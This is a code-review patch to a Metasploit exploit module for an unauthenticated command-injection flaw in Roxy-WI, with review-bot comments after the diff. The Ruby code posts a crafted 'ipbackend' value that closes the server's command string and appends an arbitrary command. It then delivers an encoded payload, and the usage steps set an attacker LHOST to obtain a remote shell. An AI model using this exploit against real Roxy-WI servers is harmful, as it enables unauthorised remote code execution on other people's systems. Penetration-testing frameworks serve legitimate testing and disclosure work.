From fc3b08fb8b97539d016878eb774df28362c444e3 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Nuri=20=C3=87ilengir?= <44322086+ncilengir@users.noreply.github.com> Date: Fri, 22 Jul 2022 12:51:40 +0000 Subject: [PATCH] Apply suggestions from code review Co-authored-by: Grant Willcox <63261883+gwillcox-r7@users.noreply.github.com> --- .../exploit/linux/http/roxy_wi_exec.md | 9 +++-- modules/exploits/linux/http/roxy_wi_exec.rb | 33 ++++++++----------- 2 files changed, 17 insertions(+), 25 deletions(-) diff --git a/documentation/modules/exploit/linux/http/roxy_wi_exec.md b/documentation/modules/exploit/linux/http/roxy_wi_exec.md index b8d60f1074..8163fd7276 100644 --- a/documentation/modules/exploit/linux/http/roxy_wi_exec.md +++ b/documentation/modules/exploit/linux/http/roxy_wi_exec.md @@ -10,7 +10,7 @@ Successful exploitation results in remote code execution under the context of th Roxy-WI requires Python and a web server to run. Please visit following url to find out required python and other packages. -[https://roxy-wi.org/installation.py](https://roxy-wi.org/installation.py) +https://roxy-wi.org/installation.py#manual ``` git clone https://github.com/hap-wi/roxy-wi.git /var/www/haproxy-wi @@ -24,12 +24,11 @@ chown -R www-data:www-data haproxy-wi 1. Install the application 2. Start msfconsole 3. Do: `use exploit/linux/http/roxy_wi_exec` -4. Set `RHOST` -5. Set `LHOST` +4. Set `RHOST` to the address of the target Roxy-WI machine. +5. Set `LHOST` to the address of your attacking machine. 8. Run `exploit` 9. Do: `run` -10. You should get a shell. -11. **Verify** that you are getting meterpreter session. +10. You should get a shell as the user running the Roxy-WI server. ## Options Set `TAGETURI` if the Roxy-WI is installed at a custom path. diff --git a/modules/exploits/linux/http/roxy_wi_exec.rb b/modules/exploits/linux/http/roxy_wi_exec.rb index 0c9e9dfc8e..4dd930711b 100644 --- a/modules/exploits/linux/http/roxy_wi_exec.rb 
+++ b/modules/exploits/linux/http/roxy_wi_exec.rb @@ -14,20 +14,17 @@ class MetasploitModule < Msf::Exploit::Remote super( update_info( info, - 'Name' => 'Roxy-WI Unauthenticated Remote Code Execution', + 'Name' => 'Roxy-WI < 6.1.1.0 Unauthenticated Command Injection RCE', 'Description' => %q{ - This module exploits command injection vulnerability to achieve remote code execution. - Unauthenticated users can execute a terminal command under the context of the web server user. - - Roxy-WI is an interface for managing HAProxy, Nginx and Keepalived servers. In versions 6.1.1.0 and earlier, - an unauthenticated user can execute some methods of administrator functions without needing any credentials. - Due to the nature of the vulnerability, an adversary can change some part of the webpage, or hijack an administrator account, - existing YAML files on the system. Successfully exploitation of that vulnerability results in configuration changes, - or execute operating system command under the context of the web-server user. + This module exploits an unauthenticated command injection vulnerability in Roxy-WI + prior to version 6.1.1.0. Successful exploitation results in remote code execution + under the context of the web server user. + + Roxy-WI is an interface for managing HAProxy, Nginx and Keepalived servers. }, 'License' => MSF_LICENSE, 'Author' => [ - 'Nuri Çilengir ' # Author & Metasploit module + 'Nuri Çilengir ' # Author & Metasploit module ], 'References' => [ ['URL', 'https://pentest.blog/advisory-roxywi-unauthenticated-remote-code-execution-cve-2022-3113/'], # Advisory 
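Review bot: The new `'Name'` (`Roxy-WI < 6.1.1.0 ...`) and description ("prior to version 6.1.1.0") exclude 6.1.1.0, while the text being removed said "In versions 6.1.1.0 and earlier", so this hunk changes which release is treated as affected without saying so. Confirm the boundary against the advisory listed in `'References'` and use the same bound in the title, the description, the documentation file and any version comparison in `check`, which lies outside this hunk. The shortened description also drops the statement that unauthenticated users can reach administrator functions; a sentence such as `Unauthenticated users can also invoke some administrator functions in affected versions.` would keep that impact visible to someone triaging exposure.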
@@ -67,14 +64,14 @@ class MetasploitModule < Msf::Exploit::Remote 'uri' => normalize_uri(target_uri.path, 'app', 'options.py'), 'vars_post' => { 'serv' => '127.0.0.1', - 'ipbackend' => "poc\"; #{cmd} ;#", + 'ipbackend' => "\"; #{cmd} ;#", 'alert_consumer' => Rex::Text.rand_text_alpha_lower(7), 'backend_server' => '127.0.0.1' } }, 10 ) rescue Rex::ConnectionRefused, Rex::HostUnreachable, Rex::ConnectionTimeout, Errno::ETIMEDOUT - fail_with(Failure::Unknown, "#{peer} - Something went wrong!") + fail_with(Failure::Unreachable, "Couldn't connect to #{peer}, check your connection!") end def check @@ -97,14 +94,10 @@ class MetasploitModule < Msf::Exploit::Remote print_status 'Trying to detect command injection vulnerability.' begin - if target['Arch'] == ARCH_PYTHON - execute_command("python3 -c \"#{payload.encoded}\"") - else - execute_command(payload.encoded) - end - rescue Rex::ConnectionRefused, Rex::HostUnreachable, Rex::ConnectionTimeout, Errno::ETIMEDOUT - fail_with(Failure::Unknown, 'Something went wrong!') - else + execute_command(payload.encoded) + rescue Rex::ConnectionRefused, Rex::HostUnreachable, Rex::ConnectionTimeout, Errno::ETIMEDOUT + fail_with(Failure::Unreachable, "Couldn't connect to #{peer}, check your connection!") + else print_good('Exploit successfully executed.') end end
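Review bot: Nothing in this part of `execute_command` explains why the `ipbackend` value has this shape or what the bare `10` means, and removing the `poc` prefix takes away the only hint that this field is the test input. I would add a comment above the request, e.g. `# 'ipbackend' is the injected field; the quote and trailing '#' presumably close and comment out the server-side command string (see advisory)`, and annotate the timeout as `}, 10 # seconds to wait for a response`. The rescue now maps every listed exception to `Failure::Unreachable`, but `send_request_cgi` can also return `nil` on a timeout without raising, and the visible lines do not show that case being handled. The method starts above the hunk, so any existing handling there should be checked first.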
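Review bot: The `rescue` added here looks unreachable, because `execute_command` (previous hunk) already rescues the same four exception classes and calls `fail_with`, which raises instead of returning. Dropping the `begin`/`rescue`/`else` wrapper and keeping the single handler in `execute_command` would remove the duplicated message. Separately, `print_good('Exploit successfully executed.')` runs whenever no exception was raised and never inspects the response, and the preceding `print_status` still says "Trying to detect" although this appears to be the exploit path rather than `check`. Wording such as `print_status('Sending payload request.')` followed by `print_status('Request sent; the response is not verified.')` would not overstate the result. The method's `def` line is outside the hunk.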